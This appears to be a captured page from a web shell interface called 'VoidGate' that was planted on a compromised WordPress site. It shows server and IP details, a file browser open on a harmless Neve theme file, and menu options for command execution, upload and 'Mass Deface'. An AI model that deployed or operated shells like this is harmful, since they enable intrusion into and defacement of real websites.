ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
173.201.252.198 / gabrieltopman.com
System
:
Linux p3plzcpnl482572.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Command
|
Upload
|
Mass Deface
|
Create
:
/
home
/
l1ltxx5gqn9k
/
public_html
/
wp-content
/
themes
/
neve
/
inc
/
views
/
Viewing: top_bar.php
<?php /** * Top Bar * * @package Neve\Views */ namespace Neve\Views; /** * Class Top_Bar */ class Top_Bar extends Base_View { /** * Add hooks for the front end. */ public function init() { $this->filter_content(); } /** * Apply filters on the top bar content. */ private function filter_content() { add_filter( 'neve_top_bar_content', 'wptexturize' ); add_filter( 'neve_top_bar_content', 'convert_smilies' ); add_filter( 'neve_top_bar_content', 'convert_chars' ); add_filter( 'neve_top_bar_content', 'wpautop' ); add_filter( 'neve_top_bar_content', 'shortcode_unautop' ); add_filter( 'neve_top_bar_content', 'do_shortcode' ); } }
Coded With 💗 by
0x6ick